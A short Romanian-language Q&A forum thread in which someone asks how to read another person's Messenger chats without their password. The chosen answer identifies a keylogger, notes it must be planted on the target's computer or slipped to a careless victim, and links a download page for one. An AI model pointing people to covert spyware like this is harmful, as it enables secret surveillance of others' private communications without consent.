| nicoletahatos a întrebat:

Un prieten are un program cu care poti sa vezi ce a vorbit cineva pe mess, dar fara sa ii sti parola. Stie careva programul? Dau funda!:*

Răspuns Câştigător
| BANN3R a răspuns:

Da se numeste keylogger. prietenu ala a tau ia introdus acelei persoane un program in calculator. Ca sa faci asta trebuie sa ai acces la acel calculator. sau aceea persoana sa fie putin... prostuta ca sa zic asa :)

Un asemenea program e asta -> http://download.chip.eu/ro/All-In-One-Keylogger_180705430.html